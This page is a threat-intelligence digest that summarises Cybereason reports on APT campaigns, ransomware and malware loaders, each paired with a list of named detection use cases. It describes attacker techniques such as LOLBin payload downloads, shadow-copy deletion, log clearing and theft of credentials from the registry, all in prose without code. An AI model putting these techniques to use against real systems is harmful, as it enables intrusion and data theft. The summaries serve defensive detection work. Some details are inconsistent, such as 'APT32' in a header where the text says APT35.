Operation CuckooBees

May 17, 2022

Operation CuckooBees

Industry: Aerospace, Biotechnology, Defense, Energy, Pharmaceuticals | Level: Strategic | Source: Cybereason

Cybereason conducted a 12-month investigation named Operation CuckooBees, researching a sophisticated global cyber espionage campaign stealing intellectual property. The campaign is considered to be attributed to the Chinese state-sponsored APT group, Winnti. Industries impacted are identified as Aerospace, Biotechnology, Defense, Energy, and Pharmaceuticals. Geographical impact was found in North America, Europe, and Asia. Cybereason has identified many companies as never reveling a breach and evidencing pointing to a longer campaign, stemming as far back as 2019. The business impact of intellectual property theft is not as immediate as threats like ransomware, DDoS, and others however, the market and financial impact is a long game. Company investment in research and development (R&D) efforts can’t be recouped and competition becomes more difficult if they’re competing against their own product. Many common means of exploits are pointed to as the cause of compromise to organizations such as “unpatched systems, insufficient network segmentation, unmanaged assets, forgotten accounts, and a lack of multi-factor authentication.” Despite a representative from the Chinese Embassy denying Chinese involvement in cyberattacks, it is likely untrue coming from a nation-state actor.

Quantum Ransomware Analyzed by Cybereason

May 17, 2022

Cybereason has been analyzing Quantum ransomware, a rebrand of various ransomware starting with Mount Locker (September 2020) to Astro Locker (March 2021) and Xing Locker (May 2021).

Tricks from SocGholish and Zloader

May 03, 2022

In the latest report by Cybereason, tracking of malware activity from SocGholish and Zloader has detailed the malware’s capabilities and infection tactics. SocGholish is named (partially) due to its social engineering tactics to lure victims with drive-by-downloads, often themed as critical browser updates.

Cybereason LOLBins & BITSadmin

March 15, 2022

Cybereason LOLBins & BITSadmin

Industry: N/A | Level: Tactical | Source: Cybereason

Cybereason’s threat hunting post dives into the usage of Living Off the Land Binaries (LOLBins) and deep dive with the tool BITSadmin. Many malware and ransomware variants abuse trust binaries for threat activities. Notable LOLBins utilized include msiexec, wscript, installutil, rundll32, regsvr32, wmic, certutil and bitsadmin. A variety of other applicable LOLBins exist that can be reviewed from the LOLbas project on Github, with many detections also available in the Anvilogic Armory. Analysis of BITSAdmin identified the tool has many applicable uses to “create, download, or upload jobs and monitor their progress” as detailed in Microsoft’s documentation. Attackers have leveraged BITSadmin’s capabilities to maliciously download payloads and/or to copy and move files. Various malware such as Astaroth malware, Egregor ransomware and ramnit trojan has utilized BITSadmin.

  • Anvilogic Scenario: Astaroth – Attack Chain with LOLBins
  • Anvilogic Use Cases:
    • BITSadmin Execution
    • Msiexec Abuse
    • Wscript/Cscript Execution
    • regsvr32 Execution
    • Rundll32 Command Line
    • Suspicious process Spawned by Java
    • Certutil File Download

Emotet Surges in Japan

March 15, 2022

Emotet Surges in Japan

Industry: N/A | Level: Tactical | Source: Cybereason

Cybereason’s tracking of Emotet malware in the first quarter of 2022, has identified a surge of Emotet activity against Japanese organizations. Emotet’s distribution has been identified through malicious Excel documents that downloads the malware upon execution. The malware uses regsvr32 to execute a malicious DLL file however it also uses a .ocx file extension. Events following, involve the malware establishing persistence in the registry and conducting reconnaissance activity. Cybereason noticed Emotet in it’s current attacks has not utilized PowerShell for deployment.

  • Anvilogic Scenarios:
    • Emotet Behaviors
    • Malicious Document Delivering Malware
  • Anvilogic Use Cases:
    • Malicious Document Execution
    • regsvr32 Execution
    • New AutoRun Registry Key
    • Common Reconnaissance Commands

Lorenz Ransomware

March 08, 2022

Lorenz Ransomware

Industry: N/A | Level: Tactical | Source: Cybereason

Cybereason reports of Lorenz ransomware were observed as early as February 2021 and they’re likely a rebranding of .sZ40 ransomware discovered in October 2020. The attackers have compromised over 20 victims targeting predominantly “English-speaking countries” across a variety of industries. The government agency Europol’s European Cybercrime Center was able to set the ransomware group back as part of the “No More Ransom” project, as a limited decryptor was released for the group’s ransomware. The threat group’s attack method is methodical, studying the victim’s network to create a customized and tailored operation. For example, the attackers impersonate ” the target’s employees, suppliers and partners. This way, the Lorenz group can even go from one, already compromised victim, to another.” After gaining a foothold on the network “the attackers start to perform reconnaissance commands, move laterally within the network, and collect sensitive data including credentials, file, databases and emails.” Given the group’s customized attack, threat behavior has varied. Common behaviors associated with the ransomware has identified the use of scheduled task to execute vssadmin to delete volume shadow copies and older samples of Lorenz have cleared windows logs. A unique extortion method the group uses involves selling the compromised data to threat actors or competitors. If the ransom isn’t paid they leak the data publicly. Lastly, the ransomware group also sells access to networks they’ve compromised.

  • Anvilogic Use Cases:
    • Inhibit System Recovery Commands
    • Create/Modify Schtasks
    • Registry key added with reg.exe
    • Clear Windows Event Logs

Cybereason Threat Analysis Report

February 15, 2022

Cybereason’s Global Security Operations Center Team (GSOC) provides a threat analysis report detailing comprehensive attack scenarios from malware loaders IcedID, QBot, and Emotet that lead to compromises with Cobalt Strike.

Phosphorus/APT32 New PowerLess Trojan

February 08, 2022

Phosphorus/APT32 New PowerLess Trojan

Industry: N/A | Level: Tactical | Source: Cybereason

Iranian group, Phosphorus/APT35/Charming Kitten, has been identified by Research from Cybereason, utilizing new PowerShell tool “PowerLess Backdoor,” while also exploiting log4shell vulnerabilities. The new malware comes with capabilities to download additional payloads for information stealing, however it’s unique with a new stealth technique as detailed from the report, “to avoid PowerShell detection by running the PowerShell Backdoor in a .NET context rather than spawning the PowerShell process.” The evasion tactic doesn’t prevent PowerShell events from being logged. The only instance in which a PowerShell process is spawned is when a process needs to be killed. Based on reviewed IOCs from Cybereason, the infrastructure utilized for the attack is highly active with an observed IP address having overlap with Memento Ransomware linking a potential connection between the threat actor group and ransomware.

  • Anvilogic Use Cases:
    • Executable Process from Suspicious Folder
    • Suspicious Powershell
    • Potential CVE-2021-44228 – Log4Shell

ProxyShell Exploited with DatopLoader Leading to Qakbot

January 18, 2022

ProxyShell Exploited with DatopLoader Leading to Qakbot

Industry: N/A | Level: Operational | Source: Cybereason

A threat report from Cybereason and security researcher, Orange Tsai, investigates a new malware loader – DatopLoader that emerged in September 2021. The malware loader was observed to be a payload dropping following the attacker’s successful exploitation of ProxyShell and Exchange vulnerabilities. Once the loader is executed, Qakbot/Qbot lands on the victim’s workstation to set up persistence and conduct reconnaissance activity, using largely native tools with the exception of AdFind. Cobalt Strike is also launched, using PsExec to move laterally in the environment. In addition, credential access has been identified through gathering from registry hives.

  • Anvilogic Scenario: DatopLoader & Qakbot
  • Anvilogic Use Cases:
    • Potential ProxyShell
    • Common Exchange Recon cmdlets
    • Exchange Remove Export Request
    • regsvr32 Execution
    • Credentials in Registry